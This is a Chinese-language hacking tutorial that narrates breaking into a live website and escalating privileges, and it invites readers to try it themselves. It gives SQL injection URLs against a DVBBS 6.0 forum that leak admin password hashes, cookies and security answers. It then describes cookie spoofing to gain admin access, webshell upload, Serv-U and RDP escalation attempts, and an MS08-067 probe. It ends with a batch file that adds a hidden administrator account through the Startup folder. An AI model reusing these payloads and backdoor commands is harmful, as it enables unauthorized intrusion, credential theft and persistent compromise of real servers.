入侵提权全过程
我是Myth灬神话,QQ:365297318 给大家一个入侵到提权的实力教程。呵呵感觉不错,对于没有服务器的可以试下。
目标站 www.*.com
首先我们要拿这个站的webshell
1.我们先进这个站转转,注册个号看下帐号的功能和网站程序。
2.找网站的后台,我们用明小子来查后台很快我们得到结果后台地址 /admin/admin_login.asp
2.得到后台我们首先试下默认帐号密码 admin、admin888、'or'='or'等,默认的无效。
3.接着找上传漏洞,我们用明小子找到upfile.asp和upfile other.asp我们来试下上传小马。很遗憾无效
4.找注入点,用明小子来找,首先明小子打开百度在设置下,然后查inurl:asp?id= site:xxx.com 接着当注入点出现。。出了好几个,看下效果如何。。哎。!没用。
5.前面都没效果哎。我们找下服务器的网站,看下这服务器上的网站,我们随便找了下,http://www.xxx.com 进去看看是个DVBBS VER 6.0.0的论坛,然后我们找管理员的名字,在地址栏中输入http://www.xxx.com/dvbbs/tongji.asp?orders=2&N=1。看到其中的管理员的名字了吗?OK,接下来在地址栏中输入“http://www.xxx.com/dvbbs/tongji.asp?orders=2&N=10%20userclass,”,这样就会查到这些人在论坛中的身份,注意其中的管理员身份的人,他具有最高权限,黑客的目标就是他。下一步,请在地址栏中输入“http://www.xxx.com/dvbbs/tongji.asp?orders=2&N=10%20userid,”,回车后在你看到的窗口中记住管理员的ID在论坛中是第几位注册用户,假设为1。再下一步,在地址栏中输入“http://www.xxx.com/dvbbs/tongji.asp?orders=2&N=10%20userpassword,”,这样你就会看到论坛中用户的密码,可惜是经过MD5加密处理的,但这已经足够了。最后再输入“http://www.xxx.com/dvbbs/tongji.asp?orders=2&N=10%20usercookies,”,回车后在出现的窗口中记下管理员的usercookies的值,一般为0。好了,到现在黑客就得到管理员的Cookies的内容了,他可以通过在本机中伪造管理员的Cookies来入侵论坛。如果你输入“http://www.xxx.com/dvbbs/tongji.asp?orders=2&N=10%20quesion,”,还可以得到论坛中用户忘记密码时的密码提示问题,输入“http://www.xxx.com/dvbbs/tongji.asp?orders=2&N=10%20answer,”可以得到他的问题答案..
接下来在该论坛新注册一个新用户,然后用Cookies欺骗软件改自己在该论坛的Cookies。其实,这一步的目的就是通过Cookies来让论坛以为你就是管理员,因为论坛判定是否是管理员的主要方法就是通过论坛ID和密码来实现的,而Cookies中记录的正是论坛ID和密码,当然这个密码是加密存放在Cookies中的。 呵呵进去了,接着就是上传图片了,在来就是备份了,都很顺利,我们传大马上去,这个服务器很烂,目录是E:\www\可以访问但没权限不能写,我找下刚的目标站,呵呵进来了,看到了进去下他数据库,哎,MD5加密了。不过我们有了这个webshell,来把它提权吧。
6.提权,先看下SHELL的组件支持,没wscript.shell 所以要CMD是不可能的。接着serv-u来提权c:\Program Files\RhinoSoft.com\serv-u,看下有没权限,
饿,没写的权限,晕!
看3389信息
[特殊端口探测]
Telnet端口:
Terminal Service端口为:3388
他的3389端口是3388呵呵来试下开始-运行-mstsc 输入xx.xx.xx.xx:3388 呵呵连接上,可是没帐号晕
看下它开了什么端口
呵呵135,139,445,1433,开了445我们用下MS08067来看看
SMB Connect OK!
Maybe Patched!
表明目标已经打上补丁了。
遗憾,没用不过我们没服务器的情况下怎么来抓这台呢。
首先来废话下,我们都知道系统启动时会加载自动启动项,我们建立个1.bat内容
net user hackb$ 123456 /add
net localgroup administrators hackb$ /add
来建立用户,把他上传到
C:\Documents and Settings\All Users\「开始」菜单\程序\启动
等管理员把电脑重起了就有我们的帐号了。呵呵,
教程完。。